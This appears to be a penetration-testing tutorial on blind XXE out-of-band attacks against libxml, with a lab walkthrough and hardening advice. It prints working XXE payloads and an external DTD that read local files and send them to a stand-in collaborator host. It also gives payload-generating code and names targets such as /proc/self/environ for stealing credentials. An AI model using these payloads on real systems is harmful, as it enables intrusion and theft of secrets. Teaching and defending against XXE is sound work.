Blind XXE OOB on Modern libxml: What Still Works in 2026

Blind XXE is the variant of XML External Entity injection where the application parses the attacker's XML, never reflects any field back, and returns a flat OK regardless of what the parser found. The bug is real, the response body is silent, and the only way I prove anything is by forcing the parser to make a side-channel network request to a host I control. Against modern libxml the picture splits in two: the direct external-entity OOB probe still fires, but the textbook recursive parameter-entity DTD chain that every older write-up demonstrates does not. This article walks through both, against a Dockerised lab, on the parser PHP 8.2 actually ships.

TL;DR

A blind XXE endpoint parses attacker XML and returns nothing useful in the response body. To prove the bug exists I need an out-of-band channel: a host I control whose access log or DNS log captures requests the vulnerable parser issues on my behalf. Two payload shapes matter. The direct external-entity reference puts an HTTP URL in a general entity's SYSTEM value and references the entity in the document body; libxml fetches the URL while resolving the entity, my collaborator logs the GET, the bug is proven. This still fires on libxml 2.9.14 (PHP 8.2). The recursive parameter-entity chain via an external DTD, the pattern every PortSwigger walk-through uses to exfiltrate file contents through a second-stage GET, does not fire end to end on modern libxml: the DTD loads, the second-stage request never lands. Both patterns are worth knowing because plenty of production parsers are not modern libxml. Burp Collaborator and Interactsh are the listener side; the technique is identical regardless of which one I pick.

Why blind XXE matters when in-band reflection does not work

A lot of endpoints parse XML and never echo any field back. Webhook receivers, async importers, SAML metadata consumers, SOAP services with a generic "accepted" envelope, document upload pipelines that queue the parse and respond before the worker runs. The textbook in-band XXE demo, where I read /etc/passwd straight out of the HTTP response, assumes the application surfaces parsed content. Half the XXE-shaped endpoints I look at do not.

That does not mean those endpoints are safe. If the parser still dereferences external entities, the side effect of parsing is an outbound request from inside the application's network position. That side effect is the bug. A successful collaborator hit is the difference between "we suspect this parser is misconfigured" and "we have a packet that says it is", and even when file-content exfil is closed off by hardening, the OOB primitive is still a usable SSRF gadget against internal HTTP services that the attacker cannot reach directly.

The two payload shapes that matter

Direct external-entity reference (fires on libxml 2.9.14)

The minimal OOB probe. A single <!ENTITY> declaration in the inline DOCTYPE, a SYSTEM URI pointing at my collaborator, and a reference to that entity somewhere in the document body so the parser is forced to resolve it:

xml

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY exfil SYSTEM "http://collab.example/?leak=fired">
]>
<bookmarks>
  <bookmark><name>&exfil;</name><url>http://x</url></bookmark>
</bookmarks>

When the parser walks the tree and hits &exfil;, it dereferences the SYSTEM URI to resolve the entity's substitution text. libxml issues an outbound HTTP GET to collab.example/?leak=fired. The collaborator logs the request. The application's response can be a literal OK and the bug is still proven.

What this payload does not do is exfiltrate file content. There is no way to bake /etc/passwd into the query string through a single general entity; the substitution layer that would let me do that is the parameter-entity layer in the next section, and that is where the hardening lives. Direct OOB proves the primitive and confirms egress. For SSRF gadgets that is already enough.
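When several probes are in flight, it helps to give each one its own marker so a collaborator hit maps back to one request. The sketch below builds the direct-entity payload shown above from a caller-supplied host and a per-probe token. The function name `build_direct_probe` and the random token are illustrative assumptions, not part of the lab.

```python
import secrets
from typing import Optional, Tuple
from urllib.parse import quote


def build_direct_probe(collab_host: str, token: Optional[str] = None) -> Tuple[str, str]:
    """Return (token, xml) for a direct external-entity OOB probe.

    collab_host is a host you control; token is a per-probe marker
    (hypothetical convention) that shows up in the collaborator log.
    """
    token = token or secrets.token_hex(4)
    # The token rides in the query string; quote() keeps it URL-safe.
    url = f"http://{collab_host}/?leak={quote(token, safe='')}"
    xml = (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        f'  <!ENTITY exfil SYSTEM "{url}">\n'
        "]>\n"
        "<bookmarks>\n"
        # The reference in the body is what forces the parser to resolve the entity.
        "  <bookmark><name>&exfil;</name><url>http://x</url></bookmark>\n"
        "</bookmarks>\n"
    )
    return token, xml
```

Calling `build_direct_probe("collab.example", token="fired")` reproduces the payload above; omitting the token yields a fresh eight-character hex marker per probe.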

Recursive parameter entity in an external DTD (does not fire on libxml 2.9.14)

This is the textbook chain. Older PortSwigger labs, older write-ups, and most XXE training material build OOB up through this pattern, because it is the one that does exfiltrate file content when it works.

The inline DOCTYPE loads a remote DTD via a parameter entity and forces the parameter entity to expand:

xml

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://collab.example/evil.dtd">
  %remote;
]>
<bookmarks>
  <bookmark><name>x</name><url>http://x</url></bookmark>
</bookmarks>

The remote evil.dtd reads a local file into one parameter entity, then uses a second parameter entity to declare a third parameter entity whose SYSTEM URI embeds the file's contents in its query string, then forces that third entity to resolve so the contents leave the host in a second outbound request:

code

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://collab.example/?x=%file;'>">
%eval;
%exfil;

Against an older libxml this chain runs end to end: the DTD loads, the file is read, the second GET arrives at the collaborator with the file's contents in the URL. Against modern libxml only the first step fires. The collaborator sees GET /evil.dtd, the second request never lands, the bytes never leave.
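The escaping in the second-stage DTD is easy to get wrong by hand, so here is a minimal sketch that renders it from a file URI and a collaborator URL. The function name `build_evil_dtd` is an assumption for illustration; the output matches the DTD shown above.

```python
def build_evil_dtd(file_uri: str, collab_url: str) -> str:
    """Render the second-stage DTD that the collaborator serves."""
    return (
        # Stage 1: read the local file into the parameter entity %file;
        f'<!ENTITY % file SYSTEM "{file_uri}">\n'
        # Stage 2: %eval; carries a nested declaration. A bare "%" inside an
        # entity value would be read as the start of a parameter-entity
        # reference, so it is written as the character reference &#x25; and
        # only becomes "<!ENTITY % exfil ...>" when %eval; is expanded.
        f"<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM '{collab_url}?x=%file;'>\">\n"
        # Stage 3: expand %eval; to declare %exfil;, then expand %exfil; to
        # trigger the outbound request carrying the file contents.
        "%eval;\n"
        "%exfil;\n"
    )
```

`build_evil_dtd("file:///etc/hostname", "http://collab.example/")` returns the four lines listed above.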

What libxml actually changed

The full timeline lives in the parent article on XML External Entity injection. The two checkpoints that matter for blind OOB:

libxml 2.9.0 (September 2012) flipped external-entity loading off by default. Callers have to opt back in with XML_PARSE_NOENT (in C) or LIBXML_NOENT (in PHP). Every textbook XXE payload from before 2013 assumed external entities loaded by default; from 2013 onward, blind XXE requires an application that has explicitly turned the feature back on. Plenty of real production code does, usually because someone needed DTD-based validation and turned everything on rather than just LIBXML_DTDLOAD.

libxml 2.9.x parameter-entity hardening (2014 onward). The 2.9.x line tightened how parameter entities loaded from an external DTD interact with subsequent entity definitions. libxml now refuses to define a new entity inside the expansion of a parameter entity loaded from an external DTD, which is the exact mechanic the recursive chain depends on. The change rolled out incrementally across 2.9.4, 2.9.10, and the subsequent point releases. By 2.9.14 (the libxml PHP 8.2 ships), the recursive PE-DTD chain is closed.

Today's production stacks land in three buckets: PHP 8.2 / 8.3 and modern Python lxml on libxml 2.9.14 close the recursive chain but leave direct OOB intact; Java DocumentBuilder behaviour depends on the JDK and whether FEATURE_SECURE_PROCESSING is set, and many enterprise SAML and SOAP servers still have both patterns working; legacy on-prem appliances and anything statically linking pre-2.9.4 libxml are fully exposed, file-content exfil and all.

Lab walkthrough

The xxe-basic lab in the techearl-labs repo ships PHP 8.2 with libxml 2.9.14 and parses incoming XML with LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_NOCDATA. The first two are the unsafe combination: LIBXML_NOENT substitutes entities, which makes the parser dereference the SYSTEM URIs declared in the inline DOCTYPE, and LIBXML_DTDLOAD loads external DTD subsets. LIBXML_NOCDATA only merges CDATA sections into text nodes and plays no part in the bug. XInclude is opted into on a separate endpoint. The blind endpoint is /upload-blind.php and returns OK regardless of what the parser found.

Boot it:

bash

docker compose up xxe-basic

The companion xxe-basic-collab container is a tiny Python HTTP server on the same Docker network with no published port; only the lab can reach it. It serves evil.dtd and logs every request to stdout. Tail it in a second terminal:

bash

docker compose logs -f xxe-basic-collab
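The collaborator's source is not reproduced in this article. As a rough sketch of what a server of that kind could look like, the code below serves evil.dtd and prints one line per request in the log shape used later in the walkthrough. Everything here is an assumption for illustration: the names `format_hit`, `response_for`, `CollabHandler`, and `make_collab_server`, the `x=` parameter in the DTD, and the `ok` body returned for other paths.

```python
import http.server

# Assumed contents of evil.dtd; the x= parameter name is illustrative.
EVIL_DTD = (
    b'<!ENTITY % file SYSTEM "file:///etc/hostname">\n'
    b"<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM "
    b"'http://xxe-basic-collab/?x=%file;'>\">\n"
    b"%eval;\n"
    b"%exfil;\n"
)


def format_hit(client_ip: str, path: str) -> str:
    """Render one log line for a request."""
    return f"[collab] GET from {client_ip} path={path}"


def response_for(path: str):
    """Return (content_type, body) for a request path."""
    if path == "/evil.dtd":
        return "application/xml-dtd", EVIL_DTD
    return "text/plain", b"ok"


class CollabHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Log first, so the hit is recorded even if the client disconnects.
        print(format_hit(self.client_address[0], self.path), flush=True)
        content_type, body = response_for(self.path)
        self.send_response(200)
        self.send_header("Content-Type", content_type)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        pass  # Suppress the default stderr access log; stdout carries ours.


def make_collab_server(host: str = "0.0.0.0", port: int = 80):
    """Build (but do not start) the listener."""
    return http.server.ThreadingHTTPServer((host, port), CollabHandler)
```

Calling `make_collab_server().serve_forever()` inside the container would start the listener; keeping it on an unpublished port, as the lab does, means only the lab container can reach it.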

Pattern 1: direct entity OOB fires

Save the direct-entity payload to payload-direct.xml (note that the URL points at the collaborator inside the Docker network, not at a public collaborator):

xml

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY exfil SYSTEM "http://xxe-basic-collab/?leak=fired">
]>
<bookmarks>
  <bookmark><name>&exfil;</name><url>http://x</url></bookmark>
</bookmarks>

POST it to the blind endpoint:

bash

curl -s -X POST --data-binary @payload-direct.xml \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/upload-blind.php

The application returns OK. The collaborator log shows a line of the shape:

code

[collab] GET from 172.18.0.3 path=/?leak=fired

That GET is the OOB primitive firing. The parser dereferenced the external entity by issuing an outbound HTTP request to a host the attacker controls, while the application's response gave nothing away.

Pattern 2: recursive PE-DTD chain does not fire

The textbook chain, saved to payload-recursive.xml:

xml

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://xxe-basic-collab/evil.dtd">
  %remote;
]>
<bookmarks>
  <bookmark><name>x</name><url>http://x</url></bookmark>
</bookmarks>

The evil.dtd on the collaborator reads /etc/hostname and declares a second-stage exfil entity that embeds the content in a query string. POST it:

bash

curl -s -X POST --data-binary @payload-recursive.xml \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/upload-blind.php

The collaborator log shows exactly one line:

code

[collab] GET from 172.18.0.3 path=/evil.dtd

The DTD loaded. The second-stage GET that was supposed to carry the file contents never arrives. That gap is the libxml 2.9.x hardening at work. The same payload against libxml 2.9.3 produces a second GET with the hostname in its query string.

A clean negative on the recursive pattern does not mean "no XXE here", just "no XXE through this chain on this parser". Try the direct-entity probe first, fall back to XInclude, and only then conclude the parser is hardened.
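The reading of the collaborator log in both patterns can be sketched as a small classifier. It assumes the log line shape shown above, the `leak=` marker from the direct probe, and an `x=` parameter on the second-stage request; the function name and stage labels are hypothetical.

```python
import re
from urllib.parse import parse_qs, urlsplit

# search() rather than match(), so prefixes added by `docker compose logs`
# in front of each line do not matter.
LOG_LINE = re.compile(r"\[collab\] GET from (?P<ip>\S+) path=(?P<path>\S+)")


def classify_hits(log_lines):
    """Map collaborator log lines to the stages that fired.

    Returns a set drawn from:
      "direct-oob"    a GET carrying the direct probe's leak= marker
      "dtd-fetched"   the external DTD was requested
      "second-stage"  a GET carrying an x= value, so the PE chain completed
    """
    stages = set()
    for line in log_lines:
        hit = LOG_LINE.search(line)
        if not hit:
            continue
        parts = urlsplit(hit.group("path"))
        query = parse_qs(parts.query, keep_blank_values=True)
        if parts.path == "/evil.dtd":
            stages.add("dtd-fetched")
        elif "leak" in query:
            stages.add("direct-oob")
        elif "x" in query:
            stages.add("second-stage")
    return stages
```

On this reading, a result of only `{"dtd-fetched"}` is the hardened-parser signature described above: the DTD loaded but the chain stopped there.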

Setting up an external collaborator

The lab uses an in-network collaborator container to keep everything offline. Against a real target you need a host whose DNS or HTTP logs you can read. The realistic options are Burp Collaborator (PortSwigger's hosted service, bundled with Burp Pro), Interactsh (ProjectDiscovery's open-source equivalent, with public servers such as oast.fun and oast.live, or self-hostable on a VPS with an NS-delegated subdomain), and browser-accessible loggers like dnslog.cn, requestbin.com, or webhook.site for one-off probes. The probe pattern is identical regardless of which one you pick: put the collaborator's hostname in the SYSTEM URI of the entity, send the payload, watch the listener.

What you can exfiltrate

The direct-entity primitive on a modern libxml proves the parser is misconfigured, confirms outbound HTTP egress (the same primitive that powers cloud-metadata SSRF), and surfaces anything the application added to the request that you did not write yourself (a templated Host header, a customer ID in the path).

The recursive PE-DTD chain, when it works against older parsers or badly-configured Java SAML, gives you file contents via file:///etc/passwd, file:///etc/hostname, the application's own config files, and environment variables through file:///proc/self/environ on Linux. The environ read is where credentials leak: cloud keys, database passwords, signing secrets, whatever the application read at startup. On Java parsers that allow it, the jar: and netdoc: URL schemes extend the reach further. On PHP with stream wrappers enabled, php://filter with the convert.base64-encode filter sidesteps the problem of file bytes that would break the XML or the URL, binary files included.
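When a file has been read through php://filter with base64 encoding, the value that reaches the collaborator still has to be decoded. A minimal sketch, assuming the value arrives in a query parameter named `x` (an illustrative choice) and that the padding may have been lost in transit:

```python
import base64
from typing import Optional
from urllib.parse import parse_qs, urlsplit


def decode_exfil(path: str, param: str = "x") -> Optional[bytes]:
    """Decode a base64 value carried in the query string of a logged path."""
    values = parse_qs(urlsplit(path).query).get(param)
    if not values:
        return None
    raw = values[0]
    # parse_qs turns "+" into a space; base64 uses "+", so restore it.
    raw = raw.replace(" ", "+")
    # Re-add any "=" padding that was stripped along the way.
    raw += "=" * (-len(raw) % 4)
    return base64.b64decode(raw)
```

The function returns `None` when the parameter is absent, which keeps it usable on log lines from the direct probe as well.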

The fix

The defence is the same as for the parent class, repeated here so this article stands on its own:

Disable external entity resolution on every XML parser that touches untrusted input. In PHP, do not pass LIBXML_NOENT and do not pass LIBXML_DTDLOAD to loadXML. The defaults since libxml 2.9.0 are correct.
In Java, set XMLConstants.FEATURE_SECURE_PROCESSING on every DocumentBuilderFactory, SAXParserFactory, and TransformerFactory, plus the disallow-doctype-decl, external-general-entities, external-parameter-entities, and load-external-dtd features set to the safe values. XMLInputFactory is configured through properties rather than features: set SUPPORT_DTD and IS_SUPPORTING_EXTERNAL_ENTITIES to false. The OWASP XXE Prevention Cheat Sheet has the full list.
In .NET, use XmlReaderSettings { DtdProcessing = Prohibit, XmlResolver = null }.
In Python, use defusedxml for stdlib parsers, and configure lxml with XMLParser(resolve_entities=False, no_network=True, load_dtd=False).
Prefer JSON for new APIs. JSON parsers have no entity-resolution layer; the class is closed off by construction.
Default-deny outbound HTTP and outbound DNS at the application VPC layer. No egress means no OOB. The detection signal that catches blind SSRF (alerting on outbound DNS queries to unusual TLDs from services that have no business resolving external domains) catches blind XXE for the same reasons. See the detection notes in blind SSRF.
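For endpoints that have no legitimate need for a DTD, the bluntest parser-side control is to reject any document that declares a DOCTYPE. The sketch below shows the idea with only the Python standard library; it is an illustration of the technique (defusedxml offers the same behaviour through its `forbid_dtd` option), and the names `parse_untrusted` and `DoctypeForbidden` are hypothetical.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def parse_untrusted(xml_bytes: bytes) -> ET.Element:
    """Parse XML, refusing any document that declares a DOCTYPE."""

    def reject(name, system_id, public_id, has_internal_subset):
        # Fires as soon as expat sees "<!DOCTYPE", before any entity
        # declared in the subset could be defined or referenced.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    # First pass: well-formedness plus the DOCTYPE check.
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = reject
    checker.Parse(xml_bytes, True)

    # Second pass: build the tree from input known to carry no DTD.
    return ET.fromstring(xml_bytes)
```

Both payloads in this article start with an inline DOCTYPE, so either one is refused before an entity is resolved. The two-pass design trades a little CPU for not depending on parser internals.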

Real-world incidents

XXE-OOB has a long CVE history. Three that are worth knowing:

CVE-2018-8033 in Apache OFBiz. The HTTP service engine (HttpEngine, reached through the /webtools/control/httpService endpoint) parsed user-supplied XML with external entities enabled, giving an unauthenticated attacker the direct external-entity OOB primitive against any internet-exposed OFBiz instance running 16.11.01 through 16.11.04. The pattern repeats across Java middleware wherever an XML-RPC or SOAP endpoint has not been touched since the parser defaults were unsafe.
The 2014 Facebook XXE reported by Reginaldo Silva (writeup). The canonical OOB-XXE-to-RCE escalation: Silva used PHP's expect:// stream wrapper to turn an XXE primitive into a shell on Facebook's parser host. The OOB confirmation was the first signal; the wrapper was the escalation. The lesson Facebook's payout encoded is that an XXE finding is never just "information disclosure", because the primitive composes with whatever stream wrappers the parser supports.
Mid-2010s enterprise XXE drip. Confluence and other Atlassian products, Jenkins, and various Cisco products accumulated a steady run of XXE CVEs, typically in XML parsers that were configured around 2010 and never revisited. Most were OOB-confirmed in disclosure write-ups even when the public fix notes describe the impact as "information disclosure". The takeaway: XXE rarely appears in greenfield code, frequently survives in legacy SOAP and SAML endpoints, and the OOB primitive is usually the first signal that something is wrong.

Why does the recursive PE-DTD pattern not fire on modern libxml?

libxml's 2.9.x line tightened parameter-entity processing across several point releases. The chain depends on defining a new entity inside the expansion of a parameter entity that was loaded from an external DTD, and modern libxml refuses to do that. The DTD still loads, but the second-stage entity that was supposed to carry the file contents in its SYSTEM URI never gets defined, so the second outbound HTTP request never lands. The direct external-entity probe does not depend on that mechanic and still fires.

Can I still use the recursive pattern against older parsers?

Yes. Plenty of production XML stacks are not modern libxml: enterprise SAML and SOAP servers running older JDKs, on-prem appliances that statically link libxml versions from before 2.9.4, and anything in a long-lived Linux distribution whose system libxml has not been bumped. The recursive chain is still the right payload to try first against those, because it is the one that exfiltrates file content rather than just proving the primitive.

Is HTTP outbound from the parser the only OOB channel?

No. DNS-only setups exfil through subdomain queries: encode the value into a subdomain under a collaborator domain you control, force the parser to resolve a hostname like file-contents.abc123.oast.fun, and read the leaked value out of the authoritative DNS log. DNS-OOB is dominant in production because outbound DNS is almost never blocked even when outbound HTTP is.

Does TLS-pinning on the collaborator help the defender?

No. TLS-pinning is a client-side control: it stops a malicious certificate from impersonating a known endpoint. The XXE-OOB primitive is the parser opening a fresh outbound connection to an attacker-chosen URL, with no expectation of pinning. The parser is its own HTTP client and trusts whatever certificate the collaborator presents. The defence against OOB is at the egress layer (default-deny outbound from application hosts) and at the parser-configuration layer (disable external entity resolution), not at TLS.

How do I tell from logs whether an XXE-OOB attempt fired?

Outbound HTTP egress logs from the application host are the first place to look: a fetch from the application to an external host it has no business contacting, especially with a path or query string that looks like exfil under collaborator domains (.oast.fun, .interactsh.com), is the signature. Outbound DNS query logs catch the DNS-OOB variant. Incoming request bodies with DOCTYPE declarations and SYSTEM URI references are unusual outside of well-defined SOAP traffic.

Where to go next

The parent article on XML External Entity injection covers the in-band file-read variant, XInclude (the entirely separate code path that bypasses entity-based defences), billion-laughs DoS, and the per-language hardening for Java, .NET, Python, and Go. The sibling variant on blind SSRF covers the OOB primitives and the detection layer in more depth, including the random-subdomain DNS detection signal that catches both classes. The hub page is the web application security vulnerabilities taxonomy.

Ishan Karunaratne